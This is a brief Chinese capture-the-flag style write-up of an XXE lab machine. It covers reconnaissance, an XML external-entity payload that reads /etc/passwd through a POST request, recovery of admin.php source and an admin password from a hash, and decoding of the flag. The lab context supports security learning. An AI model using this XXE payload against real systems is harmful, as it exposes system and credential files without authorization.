天天看點

XXE靶機

一、 收集資訊

存活主機

XXE靶機

開放端口

XXE靶機
XXE靶機
XXE靶機
XXE靶機

存在注入

Post包裡面添加

<?xml version=“1.0″ encoding=“UTF-8″?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
 <root><name>&admin;</name><password>1</password></root>
           
XXE靶機

注出admin.php頁面,然後base64解密

XXE靶機

得到賬号密碼

XXE靶機

解密e6e061838856bf47e1de730719fb2609 [email protected]

賬号:administhebest

登陸

XXE靶機
XXE靶機

得到flag

XXE靶機

先進行base32解密,再進行base64解密。

XXE靶機

讀取這個檔案看一看

XXE靶機

解碼

這。。。。看起來像php?複制下來儲存到本地,命名為1.php,放到wamp中通路一波

XXE靶機

繼續閱讀